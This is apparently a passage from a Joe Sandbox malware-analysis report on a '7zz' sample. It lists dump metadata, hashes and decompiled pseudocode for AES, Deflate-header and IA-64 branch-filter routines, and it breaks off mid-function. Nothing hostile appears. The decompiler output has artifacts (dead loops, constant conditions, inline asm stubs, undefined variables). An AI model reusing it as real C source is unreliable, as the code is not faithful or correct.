                                                                                                                                    0x0044cd9d
                                                                                                                                    0x0044cda0
                                                                                                                                    0x0044cda0
                                                                                                                                    0x0044cdac
                                                                                                                                    0x0044cdcc

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5364b3d38da24dceb4fc74032ce6d375fea4b89270f7dfad01ac66195bbe4028
                                                                                                                                    • Instruction ID: f1a358e19409f11fecb9658b58595b2dff66520b4aac72c743e58953db3de8aa
                                                                                                                                    • Opcode Fuzzy Hash: 5364b3d38da24dceb4fc74032ce6d375fea4b89270f7dfad01ac66195bbe4028
                                                                                                                                    • Instruction Fuzzy Hash: B2B1C535205B418FD724DE39D4D02ABBBE2EFDA314F14892ED4DE87751DA34A90ACB48
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046A460 Relevance: .3, Instructions: 300COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0046A460(intOrPtr* __eax, signed int* __ecx) {
				signed int* _t169;
				unsigned int _t171;
				unsigned int _t178;
				unsigned int _t213;
				signed int* _t254;
				unsigned int _t262;
				unsigned int _t266;
				unsigned int _t273;
				unsigned int _t284;
				unsigned int _t289;
				signed int _t365;
				unsigned int _t375;
				unsigned int _t385;
				signed int _t409;
				void* _t437;

				_t171 =  *(__eax + 0x1c) ^ __ecx[3];
				_t266 =  *(__eax + 0x14) ^ __ecx[1];
				 *((intOrPtr*)(_t437 + 0xc)) =  *__eax;
				_t213 =  *(__eax + 0x18) ^ __ecx[2];
				_t289 =  *(__eax + 0x10) ^  *__ecx;
				 *(_t437 + 0x2c) = _t266;
				 *(_t437 + 0x14) = _t266 >> 0x00000008 & 0x000000ff;
				 *(_t437 + 0x28) = _t289;
				_t375 =  *(0x491968 + (_t171 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t266 >> 0x18) * 4) ^  *(0x491568 + (_t213 & 0x000000ff) * 4) ^  *(__eax + 0x28);
				_t273 =  *(0x491d68 + (_t213 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + (_t171 >> 0x18) * 4) ^  *(0x491568 + (_t289 & 0x000000ff) * 4) ^  *(__eax + 0x20);
				_t169 = __eax + 0x20;
				_t409 =  *(0x491d68 + ( *(_t437 + 0x2c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t289 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t213 >> 0x18) * 4) ^  *(0x491568 + (_t171 & 0x000000ff) * 4) ^ _t169[3];
				_t178 =  *(0x491d68 + (_t171 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t213 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + ( *(_t437 + 0x28) >> 0x18) * 4) ^  *(0x491568 + ( *(_t437 + 0x2c) & 0x000000ff) * 4) ^ _t169[1];
				_t52 = _t437 + 0x10;
				 *_t52 =  *((intOrPtr*)(_t437 + 0x10)) - 1;
				 *(_t437 + 0x20) = _t375;
				 *(_t437 + 0x18) = _t273;
				if( *_t52 != 0) {
					do {
						 *(_t437 + 0x14) = _t375 >> 0x00000010 & 0x000000ff;
						 *(_t437 + 0x14) = _t273 >> 0x00000008 & 0x000000ff;
						_t385 =  *(0x491968 + (_t178 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + (_t409 >> 0x18) * 4) ^  *(0x491568 + (_t273 & 0x000000ff) * 4) ^ _t169[4];
						_t284 =  *(0x491d68 + (_t178 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + ( *(_t437 + 0x20) >> 0x18) * 4) ^  *(0x491568 + (_t409 & 0x000000ff) * 4) ^ _t169[7];
						_t262 =  *(0x491968 + (_t409 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t273 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t178 >> 0x18) * 4) ^  *(0x491568 + (_t375 & 0x000000ff) * 4) ^ _t169[6];
						 *(_t437 + 0x14) =  *(_t437 + 0x20) >> 0x00000008 & 0x000000ff;
						_t365 =  *(0x491d68 + (_t409 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 +  *(_t437 + 0x14) * 4) ^  *(0x492168 + ( *(_t437 + 0x18) >> 0x18) * 4) ^  *(0x491568 + (_t178 & 0x000000ff) * 4) ^ _t169[5];
						_t169 =  &(_t169[8]);
						 *(_t437 + 0x20) =  *(0x491968 + (_t284 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x491d68 + (_t385 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492168 + (_t365 >> 0x18) * 4) ^  *(0x491568 + (_t262 & 0x000000ff) * 4) ^ _t169[2];
						 *(_t437 + 0x18) =  *(0x491d68 + (_t262 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t365 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t284 >> 0x18) * 4) ^  *(0x491568 + (_t385 & 0x000000ff) * 4) ^  *_t169;
						_t409 =  *(0x491d68 + (_t365 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t385 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t262 >> 0x18) * 4) ^  *(0x491568 + (_t284 & 0x000000ff) * 4) ^ _t169[3];
						_t273 =  *(_t437 + 0x18);
						_t375 =  *(_t437 + 0x20);
						_t178 =  *(0x491d68 + (_t284 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x491968 + (_t262 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492168 + (_t385 >> 0x18) * 4) ^  *(0x491568 + (_t365 & 0x000000ff) * 4) ^ _t169[1];
						_t140 = _t437 + 0x10;
						 *_t140 =  *((intOrPtr*)(_t437 + 0x10)) - 1;
					} while ( *_t140 != 0);
				}
				 *( *(_t437 + 0x3c)) = ((( *((_t375 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t409 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t178 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t273 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[4];
				( *(_t437 + 0x3c))[1] = ((( *((_t409 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t273 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t375 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t178 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[5];
				_t254 =  *(_t437 + 0x3c);
				_t254[2] = ((( *((_t273 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t178 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t409 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t375 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[6];
				_t254[3] = ((( *((_t178 >> 0x00000010 & 0x000000ff) + 0x48dc78) & 0x000000ff | ( *((_t375 >> 0x18) + 0x48dc78) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t273 >> 0x00000008 & 0x000000ff) + 0x48dc78) & 0x000000ff) << 0x00000008 |  *((_t409 & 0x000000ff) + 0x48dc78) & 0x000000ff) ^ _t169[7];
				return _t169;
			}


















                                                                                                                                    0x0046a46e
                                                                                                                                    0x0046a471
                                                                                                                                    0x0046a476
                                                                                                                                    0x0046a47d
                                                                                                                                    0x0046a484
                                                                                                                                    0x0046a4c5
                                                                                                                                    0x0046a4dd
                                                                                                                                    0x0046a515
                                                                                                                                    0x0046a529
                                                                                                                                    0x0046a52c
                                                                                                                                    0x0046a57c
                                                                                                                                    0x0046a599
                                                                                                                                    0x0046a59c
                                                                                                                                    0x0046a59f
                                                                                                                                    0x0046a59f
                                                                                                                                    0x0046a5a3
                                                                                                                                    0x0046a5a7
                                                                                                                                    0x0046a5ab
                                                                                                                                    0x0046a5b1
                                                                                                                                    0x0046a604
                                                                                                                                    0x0046a649
                                                                                                                                    0x0046a66f
                                                                                                                                    0x0046a683
                                                                                                                                    0x0046a68f
                                                                                                                                    0x0046a69b
                                                                                                                                    0x0046a6ce
                                                                                                                                    0x0046a70e
                                                                                                                                    0x0046a714
                                                                                                                                    0x0046a75e
                                                                                                                                    0x0046a7a8
                                                                                                                                    0x0046a7b1
                                                                                                                                    0x0046a7cf
                                                                                                                                    0x0046a7e0
                                                                                                                                    0x0046a7e3
                                                                                                                                    0x0046a7e3
                                                                                                                                    0x0046a7e3
                                                                                                                                    0x0046a5b1
                                                                                                                                    0x0046a842
                                                                                                                                    0x0046a899
                                                                                                                                    0x0046a8ed
                                                                                                                                    0x0046a8f1
                                                                                                                                    0x0046a93d
                                                                                                                                    0x0046a947

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9d85033acdc5af3603231ca3bb88f19969520e1c4114c2203dc3061eb624cb0d
                                                                                                                                    • Instruction ID: 75d05c7fad47a1a52beca39c83a488ef50f93caae19ee7ec22463264903e5419
                                                                                                                                    • Opcode Fuzzy Hash: 9d85033acdc5af3603231ca3bb88f19969520e1c4114c2203dc3061eb624cb0d
                                                                                                                                    • Instruction Fuzzy Hash: 01D1BB728147A74FE318DF5DDC902357762AFD8250F0B063AC7951B2A2CB34BA11DB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0044A440 Relevance: .3, Instructions: 291COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E0044A440(void* __ecx, void* __eflags) {
				void* _t114;
				intOrPtr _t128;
				void* _t132;
				signed int _t165;
				void* _t176;
				signed int _t179;
				void* _t191;
				unsigned int _t194;
				intOrPtr _t196;
				signed int _t197;
				signed int _t204;
				signed int _t205;
				signed int _t211;
				unsigned int _t220;
				unsigned int _t221;
				signed int _t222;
				signed char _t239;
				intOrPtr* _t244;
				int _t245;
				intOrPtr _t246;
				unsigned int _t258;
				void* _t274;
				int _t285;
				void* _t288;
				void* _t290;
				void* _t291;
				signed int _t292;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;

				_t293 = __ecx;
				 *((char*)(__ecx + 0xd48)) = E0044A200(1) & 0xffffff00 | _t112 == 0x00000001;
				_t114 = E0044A200(2);
				if(_t114 <= 2) {
					if(_t114 != 0) {
						 *((char*)(__ecx + 0xd49)) = 0;
						if(_t114 != 1) {
							 *((intOrPtr*)(_t294 + 0x20)) = E0044A200(5) + 0x101;
							 *((intOrPtr*)(__ecx + 0xd4c)) = E0044A200(5) + 1;
							_t176 = E0044A200(4) + 4;
							if( *((intOrPtr*)(__ecx + 0xd51)) != 0 ||  *((intOrPtr*)(__ecx + 0xd4c)) <= 0x1e) {
								_t285 = 0;
								do {
									if(_t285 >= _t176) {
										 *((char*)(_t294 + 0x20)) = 0;
									} else {
										 *((char*)(_t294 + 0x20)) = E0044A200(3);
									}
									_t285 = _t285 + 1;
								} while (_t285 < 0x13);
								_t244 = _t293 + 0xaf8;
								memset(_t294 + 0x38, 0, 0xf << 2);
								_t295 = _t294 + 0xc;
								_t258 = 0;
								_t191 = 0;
								while(0 <= 0xf) {
									 *_t244 = 0xffffffff;
									_t191 = _t191 + 1;
									_t244 = _t244 + 4;
									 *((intOrPtr*)(_t295 + 0x34)) =  *((intOrPtr*)(_t295 + 0x34)) + 1;
									if(_t191 < 0x13) {
										continue;
									} else {
										_t128 = 0;
										 *(_t295 + 0x34) = _t258;
										 *(_t293 + 0xa78) = _t258;
										 *(_t293 + 0xab8) = _t258;
										 *((intOrPtr*)(_t295 + 0x10)) = 0;
										_t245 = 1;
										while(1) {
											_t288 = _t295 + 0x34 + _t245 * 4;
											_t258 = _t258 + ( *(_t295 + 0x34 + _t245 * 4) << 0xf - _t245);
											 *(_t295 + 0x18) = _t258;
											if(_t258 > 0x8000) {
												goto L35;
											}
											_t194 = 0x8000;
											if(_t245 != 0xf) {
												_t194 = _t258;
											}
											 *(_t293 + 0xa78 + _t245 * 4) = _t194;
											_t196 =  *((intOrPtr*)(_t293 + 0xab4 + _t245 * 4)) +  *((intOrPtr*)(_t288 - 4));
											 *((intOrPtr*)(_t293 + 0xab8 + _t245 * 4)) = _t196;
											 *((intOrPtr*)(_t295 + 0x1b4 + _t245 * 4)) = _t196;
											if(_t245 <= 9) {
												_t220 =  *(_t293 + 0xa78 + _t245 * 4) >> 6;
												if(_t128 < _t220) {
													_t75 = _t293 + 0xb44; // 0xb44
													_t274 = _t128 + _t75;
													_t221 = _t220 - _t128;
													 *(_t295 + 0x14) = _t221;
													_t292 = _t221;
													_t222 = _t221 >> 2;
													memset(_t274 + _t222, memset(_t274, _t245, _t222 << 2), (_t292 & 0x00000003) << 0);
													_t295 = _t295 + 0x18;
													_t258 =  *(_t295 + 0x18);
													_t128 =  *((intOrPtr*)(_t295 + 0x10)) + _t292;
													 *((intOrPtr*)(_t295 + 0x10)) = _t128;
												}
											}
											_t245 = _t245 + 1;
											if(_t245 <= 0xf) {
												continue;
											} else {
												_t246 = 0;
												do {
													if(0 != 0) {
														_t197 =  *(_t295 + 0x1b4);
														 *((intOrPtr*)(_t293 + 0xaf8 + _t197 * 4)) = _t246;
														 *(_t295 + 0x1b4) = _t197 + 1;
													}
													_t246 = _t246 + 1;
												} while (_t246 < 0x13);
												_t179 =  *(_t295 + 0x1c);
												_t132 = E0044A2A0(_t295 + 0x1f4, _t179 +  *(_t293 + 0xd4c));
												if(_t132 != 0) {
													_t290 = _t295 + 0x1f4;
													memset(_t295 + 0x175, 0, 7 << 2);
													_t296 = _t295 + 0xc;
													asm("stosw");
													asm("stosb");
													memset(_t296 + 0x194, 0, 8 << 2);
													_t297 = _t296 + 0xc;
													_t204 = _t179;
													_t205 = _t204 >> 2;
													memcpy(_t297 + 0x74, _t290, _t205 << 2);
													memcpy(_t290 + _t205 + _t205, _t290, _t204 & 0x00000003);
													_t299 = _t297 + 0x18;
													_t291 = _t299 + _t179 + 0x1f4;
													_t211 =  *(_t293 + 0xd4c) >> 2;
													memcpy(_t291 + _t211 + _t211, _t291, memcpy(_t299 + 0x194, _t291, _t211 << 2) & 0x00000003);
													_t301 = _t299 + 0x18;
													goto L34;
												} else {
													return _t132;
												}
											}
											goto L37;
										}
										goto L35;
									}
									goto L37;
								}
								goto L35;
							} else {
								return 0;
							}
						} else {
							memset(_t294 + 0x74, 0x8080808, 0x24 << 2);
							_t303 = _t294 + 0xc;
							memset(_t303 + 0x104, 0x9090909, 0x1c << 2);
							_t304 = _t303 + 0xc;
							memset(_t304 + 0x174, 0x7070707, 6 << 2);
							_t305 = _t304 + 0xc;
							 *(_t305 + 0x18c) = 0x8080808;
							 *(_t305 + 0x190) = 0x8080808;
							memset(_t305 + 0x194, 0x5050505, 8 << 2);
							_t301 = _t305 + 0xc;
							asm("sbb eax, eax");
							 *(_t293 + 0xd4c) = ( ~( *(_t293 + 0xd51)) & 0x00000002) + 0x1e;
							L34:
							_push(_t301 + 0x74);
							if(L0044B440(_t293 + 0x78) != 0) {
								_push(_t301 + 0x194);
								return L0044B590(_t293 + 0x778);
							} else {
								L35:
								return 0;
							}
						}
					} else {
						 *((char*)(__ecx + 0xd49)) = 1;
						_t165 =  *(__ecx + 0x40);
						_t239 =  ~_t165 & 0x00000007;
						 *(__ecx + 0x40) = _t165 + _t239;
						 *(__ecx + 0x70) =  *(__ecx + 0x70) >> _t239;
						 *((intOrPtr*)(__ecx + 0xd44)) = E0044A200(0x10);
						if( *((intOrPtr*)(__ecx + 0xd50)) == 0) {
							return 0 |  *((intOrPtr*)(__ecx + 0xd44)) == ( !(E0044A200(0x10)) & 0x0000ffff);
						} else {
							return 1;
						}
					}
				} else {
					return 0;
				}
				L37:
			}








































                                                                                                                                    0x0044a44a
                                                                                                                                    0x0044a45d
                                                                                                                                    0x0044a463
                                                                                                                                    0x0044a46b
                                                                                                                                    0x0044a47c
                                                                                                                                    0x0044a4ef
                                                                                                                                    0x0044a4f6
                                                                                                                                    0x0044a581
                                                                                                                                    0x0044a58f
                                                                                                                                    0x0044a5a2
                                                                                                                                    0x0044a5a7
                                                                                                                                    0x0044a5bf
                                                                                                                                    0x0044a5c1
                                                                                                                                    0x0044a5cd
                                                                                                                                    0x0044a5de
                                                                                                                                    0x0044a5cf
                                                                                                                                    0x0044a5d8
                                                                                                                                    0x0044a5d8
                                                                                                                                    0x0044a5e3
                                                                                                                                    0x0044a5e4
                                                                                                                                    0x0044a5f4
                                                                                                                                    0x0044a5fa
                                                                                                                                    0x0044a5fa
                                                                                                                                    0x0044a5fc
                                                                                                                                    0x0044a5fe
                                                                                                                                    0x0044a600
                                                                                                                                    0x0044a618
                                                                                                                                    0x0044a61e
                                                                                                                                    0x0044a61f
                                                                                                                                    0x0044a625
                                                                                                                                    0x0044a627
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a629
                                                                                                                                    0x0044a629
                                                                                                                                    0x0044a62b
                                                                                                                                    0x0044a62f
                                                                                                                                    0x0044a635
                                                                                                                                    0x0044a63b
                                                                                                                                    0x0044a63f
                                                                                                                                    0x0044a644
                                                                                                                                    0x0044a648
                                                                                                                                    0x0044a655
                                                                                                                                    0x0044a65d
                                                                                                                                    0x0044a661
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a66a
                                                                                                                                    0x0044a66f
                                                                                                                                    0x0044a671
                                                                                                                                    0x0044a671
                                                                                                                                    0x0044a676
                                                                                                                                    0x0044a684
                                                                                                                                    0x0044a689
                                                                                                                                    0x0044a690
                                                                                                                                    0x0044a697
                                                                                                                                    0x0044a6a0
                                                                                                                                    0x0044a6a5
                                                                                                                                    0x0044a6a7
                                                                                                                                    0x0044a6a7
                                                                                                                                    0x0044a6ae
                                                                                                                                    0x0044a6b2
                                                                                                                                    0x0044a6b8
                                                                                                                                    0x0044a6c4
                                                                                                                                    0x0044a6ce
                                                                                                                                    0x0044a6ce
                                                                                                                                    0x0044a6d4
                                                                                                                                    0x0044a6da
                                                                                                                                    0x0044a6dc
                                                                                                                                    0x0044a6dc
                                                                                                                                    0x0044a6a5
                                                                                                                                    0x0044a6e0
                                                                                                                                    0x0044a6e4
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a6ea
                                                                                                                                    0x0044a6ea
                                                                                                                                    0x0044a6ec
                                                                                                                                    0x0044a6f4
                                                                                                                                    0x0044a6f6
                                                                                                                                    0x0044a704
                                                                                                                                    0x0044a70c
                                                                                                                                    0x0044a70c
                                                                                                                                    0x0044a70e
                                                                                                                                    0x0044a70f
                                                                                                                                    0x0044a714
                                                                                                                                    0x0044a72d
                                                                                                                                    0x0044a734
                                                                                                                                    0x0044a74f
                                                                                                                                    0x0044a756
                                                                                                                                    0x0044a756
                                                                                                                                    0x0044a758
                                                                                                                                    0x0044a75a
                                                                                                                                    0x0044a769
                                                                                                                                    0x0044a769
                                                                                                                                    0x0044a76b
                                                                                                                                    0x0044a773
                                                                                                                                    0x0044a776
                                                                                                                                    0x0044a77d
                                                                                                                                    0x0044a77d
                                                                                                                                    0x0044a785
                                                                                                                                    0x0044a795
                                                                                                                                    0x0044a79f
                                                                                                                                    0x0044a79f
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a740
                                                                                                                                    0x0044a740
                                                                                                                                    0x0044a740
                                                                                                                                    0x0044a734
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a6e4
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a644
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a627
                                                                                                                                    0x00000000
                                                                                                                                    0x0044a5b5
                                                                                                                                    0x0044a5be
                                                                                                                                    0x0044a5be
                                                                                                                                    0x0044a4f8
                                                                                                                                    0x0044a50b
                                                                                                                                    0x0044a50b
                                                                                                                                    0x0044a51e
                                                                                                                                    0x0044a51e
                                                                                                                                    0x0044a531
                                                                                                                                    0x0044a531
                                                                                                                                    0x0044a533
                                                                                                                                    0x0044a54b
                                                                                                                                    0x0044a552
                                                                                                                                    0x0044a552
                                                                                                                                    0x0044a55c
                                                                                                                                    0x0044a564
                                                                                                                                    0x0044a7a1
                                                                                                                                    0x0044a7a5
                                                                                                                                    0x0044a7b0
                                                                                                                                    0x0044a7cc
                                                                                                                                    0x0044a7dc
                                                                                                                                    0x0044a7b5
                                                                                                                                    0x0044a7b5
                                                                                                                                    0x0044a7be
                                                                                                                                    0x0044a7be
                                                                                                                                    0x0044a7b0
                                                                                                                                    0x0044a47e
                                                                                                                                    0x0044a47e
                                                                                                                                    0x0044a485
                                                                                                                                    0x0044a48f
                                                                                                                                    0x0044a49a
                                                                                                                                    0x0044a49d
                                                                                                                                    0x0044a4a5
                                                                                                                                    0x0044a4b3
                                                                                                                                    0x0044a4eb
                                                                                                                                    0x0044a4b8
                                                                                                                                    0x0044a4c1
                                                                                                                                    0x0044a4c1
                                                                                                                                    0x0044a4b3
                                                                                                                                    0x0044a470
                                                                                                                                    0x0044a479
                                                                                                                                    0x0044a479
                                                                                                                                    0x00000000

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6d2144b61ffc51926405787fbc7a6f653c85888bbca718787b1c5e10c8b43391
                                                                                                                                    • Instruction ID: 9bb6accf8b061612f2bcebb0087019938af92876cfc06ddf3499721ed1c01372
                                                                                                                                    • Opcode Fuzzy Hash: 6d2144b61ffc51926405787fbc7a6f653c85888bbca718787b1c5e10c8b43391
                                                                                                                                    • Instruction Fuzzy Hash: EEA107317483444BFF389E28D8513EEB7D2EBC4308F54443EDA898B781DA7AA9198756
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00458B30 Relevance: .2, Instructions: 180COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                    			E00458B30(signed char* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _t102;
				signed int _t104;
				signed int _t112;
				signed int _t123;
				intOrPtr _t132;
				signed int _t136;
				signed int _t138;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				signed int _t149;
				unsigned int _t164;
				signed int _t165;
				signed int _t182;
				signed int _t184;
				signed int _t191;
				signed int _t198;
				signed char* _t205;
				signed int _t208;
				unsigned int _t212;
				signed int _t218;
				unsigned int _t222;

				if(__edx >= 0x10) {
					_v20 = __edx - 0x10;
					_v44 = 0;
					_t205 = __ecx;
					_v24 = _a4 - __ecx;
					do {
						_t102 = 5;
						_t208 = 0;
						_v28 =  *(( *_t205 & 0x1f) + 0x47c5bc) & 0x000000ff;
						_v32 = 5;
						_v36 = 0;
						do {
							_t182 = _v28 >> _t208;
							if((_t182 & 0x00000001) != 0) {
								_t212 = _t102 >> 3;
								_t104 = _t205[_t212 + 5] & 0x000000ff;
								asm("cdq");
								asm("cdq");
								_t136 = (_t104 << 8) + (_t205[_t212 + 4] & 0x000000ff);
								asm("adc ebp, edx");
								asm("cdq");
								_t138 = (_t136 << 8) + (_t205[_t212 + 3] & 0x000000ff);
								asm("adc ebp, edx");
								asm("cdq");
								_t140 = (_t138 << 8) + (_t205[_t212 + 2] & 0x000000ff);
								asm("adc ebp, edx");
								asm("cdq");
								_t142 = (_t140 << 8) + (_t205[_t212 + 1] & 0x000000ff);
								asm("adc ebp, edx");
								_t218 = (((((_t182 << 0x00000020 | _t104) << 0x8 << 0x00000020 | _t136) << 0x8 << 0x00000020 | _t138) << 0x8 << 0x00000020 | _t140) << 0x8 << 0x00000020 | _t142) << 8;
								asm("cdq");
								asm("adc ebp, edx");
								_t184 = _t218;
								_v40 = _t102 & 0x00000007;
								_v16 = (_t142 << 8) + (_t205[_t212] & 0x000000ff);
								_v12 = _t218;
								_t112 = L0046B2E0((_t142 << 8) + (_t205[_t212] & 0x000000ff), _t102 & 0x00000007, _t184);
								_t145 = _t184;
								_v8 = _t112;
								if((_t145 >> 0x00000005 & 0x0000000f) == 5 && 0 == 0 && (_t112 & 0x00000e00) == 0) {
									_t191 = ((_t145 >> 0x00000004 & 0x00000001) << 0x00000014 | (_t145 << 0x00000020 | _t112) >> 0xd & 0x000fffff) << 4;
									if(_a8 == 0) {
										_t164 = _t191 - _v44 - _a4;
									} else {
										_t164 = _v24 + _t205 + _t191;
									}
									_t165 = _t164 >> 4;
									_t198 = ((0 << 0x00000020 | _t165 & 0x00100000) << 0x3 << 0x00000020 | (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 | _t165 & 0x000fffff) << 0xd | _t145 & 0xffffffee;
									_t123 = E0046C5A0(((_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 + (_t165 & 0x00100000) + _t116 | _t165 & 0x000fffff) << 0x0000000d | _v8 & 0x00001fff, _v40, _t198);
									asm("cdq");
